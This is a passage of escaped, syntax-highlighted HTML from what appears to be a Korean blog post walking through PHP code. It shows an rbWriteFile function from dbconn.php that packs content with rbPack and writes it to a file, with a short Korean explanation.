margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;6&lt;/div&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class=&quot;crayon-code&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; padding: 0px !important; vertical-align: top !important; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace !important; border: 0px; margin: 0px !important; background: 0px center; width: 729.6px;&quot;&gt;&lt;div class=&quot;crayon-pre&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; padding-right: 0px; padding-left: 0px; margin: 0px; white-space: pre; overflow: visible; tab-size: 4; background: none !important; border: none !important; padding-top: 5px !important; padding-bottom: 3px !important; font-size: 12px !important; line-height: 15px !important;&quot;&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a99607844672-1&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-t&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important; color: rgb(128, 0, 128) !important;&quot;&gt;function&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rbWriteFile&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$filePath&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$fileContent&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;{&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a99607844672-2&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$opened&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-o&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;fopen&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$filePath&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;w&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-st&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important;&quot;&gt;or&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-k &quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;die&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-s&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(221, 17, 68) !important;&quot;&gt;&quot;Unable to open file!&quot;&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a99607844672-3&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;fwrite&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$opened&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rbPack&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$fileContent&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a99607844672-4&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;fclose&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$opened&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a99607844672-5&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt;	&lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;clearstatcache&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;crayon-line crayon-striped-line&quot; id=&quot;crayon-5c677473e1a99607844672-6&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;}&lt;/span&gt;&lt;/div&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;/div&gt;&lt;/div&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;&lt;strong style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;rbWriteFile function in dbconn.php&lt;/strong&gt;&lt;/p&gt;&lt;p style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; margin-right: 0px; margin-bottom: 15px; margin-left: 0px; font-size: 18px; line-height: 1.618; color: rgb(60, 72, 88); font-family: Roboto, Helvetica, Arial, sans-serif;&quot;&gt;먼저 파일 경로에 있는 파일을 불러오고, rbPack 함수를 이용해 파일의 내용을 패킹한 후 해당 경로에 있는 파일에 저장합니다.&lt;/p&gt;&lt;div id=&quot;crayon-5c677473e1a9d336357845&quot; class=&quot;crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-pc print-yes notranslate&quot; data-settings=&quot; minimize scroll-mouseover&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; text-size-adjust: none; width: 750px; padding: 0px; margin: 12px 0px; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace; color: rgb(60, 72, 88); height: auto; overflow: hidden !important; position: relative !important; direction: ltr !important; border: 1px solid rgb(222, 222, 222) !important; background-color: rgb(248, 248, 255) !important; font-size: 12px !important; line-height: 15px !important;&quot;&gt;&lt;div class=&quot;crayon-plain-wrap form-group&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; position: relative; background: 0px center; border: 0px; margin: 0px !important; padding: 0px !important; height: auto !important;&quot;&gt;&lt;textarea wrap=&quot;soft&quot; class=&quot;crayon-plain print-no form-control&quot; data-settings=&quot;dblclick&quot; readonly=&quot;&quot; style=&quot;-webkit-tap-highlight-color: transparent; color: rgb(0, 0, 0); font-style: inherit; font-variant: inherit; font-stretch: inherit; margin: 0px 0px 7px; overflow: hidden; max-width: 100%; padding-top: 0px; padding-right: 5px; padding-left: 5px; display: block; width: 748px; height: 0px; background: linear-gradient(rgb(156, 39, 176), rgb(156, 39, 176)) center bottom / 0px 2px no-repeat, linear-gradient(rgb(210, 210, 210), rgb(210, 210, 210)) center calc(100% - 1px) / 100% 1px transparent; border-width: 0px; border-style: initial; border-color: initial; border-radius: 0px; box-shadow: none; transition: background 0s ease-out 0s; float: none; vertical-align: middle; resize: none; position: absolute; opacity: 0; white-space: pre; overflow-wrap: normal; tab-size: 4; z-index: 0; font-size: 12px !important; line-height: 15px !important; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace !important;&quot;&gt;&lt;/textarea&gt;&lt;/div&gt;&lt;div class=&quot;crayon-main&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; background: 0px center; border: 0px; padding: 0px; margin: 0px; width: 748px; overflow: hidden; position: relative; z-index: 1;&quot;&gt;&lt;table class=&quot;crayon-table&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-size: 18px; margin-left: 0px; border-collapse: collapse !important; border-spacing: 0px !important; background: none !important; width: auto !important; border: none !important; padding: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-top: 0px !important; table-layout: auto !important;&quot;&gt;&lt;tbody style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent;&quot;&gt;&lt;tr class=&quot;crayon-row&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; background: 0px center; border: none !important; padding: 0px !important; vertical-align: top !important; margin: 0px !important;&quot;&gt;&lt;td class=&quot;crayon-nums &quot; data-settings=&quot;show&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; padding: 0px !important; vertical-align: top !important; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace !important; border: 0px; margin: 0px !important; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important;&quot;&gt;&lt;div class=&quot;crayon-nums-content&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; background: 0px center; border: 0px; padding-right: 0px; padding-left: 0px; margin: 0px; white-space: nowrap; padding-top: 5px !important; padding-bottom: 3px !important; font-size: 12px !important; line-height: 15px !important;&quot;&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a9d336357845-1&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;1&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a9d336357845-2&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;2&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a9d336357845-3&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;3&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a9d336357845-4&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;4&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a9d336357845-5&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;5&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a9d336357845-6&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;6&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a9d336357845-7&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;7&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a9d336357845-8&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;8&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a9d336357845-9&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;9&lt;/div&gt;&lt;div class=&quot;crayon-num crayon-striped-num&quot; data-line=&quot;crayon-5c677473e1a9d336357845-10&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;10&lt;/div&gt;&lt;div class=&quot;crayon-num&quot; data-line=&quot;crayon-5c677473e1a9d336357845-11&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; padding: 0px 5px; margin: 0px; text-align: right !important; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;&quot;&gt;11&lt;/div&gt;&lt;/div&gt;&lt;/td&gt;&lt;td class=&quot;crayon-code&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; padding: 0px !important; vertical-align: top !important; font-family: Monaco, MonacoRegular, &amp;quot;Courier New&amp;quot;, monospace !important; border: 0px; margin: 0px !important; background: 0px center; width: 722.4px;&quot;&gt;&lt;div class=&quot;crayon-pre&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; padding-right: 0px; padding-left: 0px; margin: 0px; white-space: pre; overflow: visible; tab-size: 4; background: none !important; border: none !important; padding-top: 5px !important; padding-bottom: 3px !important; font-size: 12px !important; line-height: 15px !important;&quot;&gt;&lt;div class=&quot;crayon-line&quot; id=&quot;crayon-5c677473e1a9d336357845-1&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; background: 0px center; border: 0px; padding: 0px 5px; margin: 0px; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important;&quot;&gt;&lt;span class=&quot;crayon-t&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: bold !important; color: rgb(128, 0, 128) !important;&quot;&gt;function&lt;/span&gt;&lt;span class=&quot;crayon-h&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 111, 224) !important;&quot;&gt; &lt;/span&gt;&lt;span class=&quot;crayon-e&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: teal !important;&quot;&gt;rbPack&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(51, 51, 51) !important;&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;crayon-v&quot; style=&quot;box-sizing: border-box; -webkit-tap-highlight-color: transparent; font-family: inherit; height: inherit; font-size: inherit !important; line-height: inherit !important; font-weight: inherit !important; color: rgb(0, 45, 122) !important;&quot;&gt;$data&lt;/span&gt;&lt;span class=&quot;crayon-sy&quot; style=&quot;box-sizing: border-box; 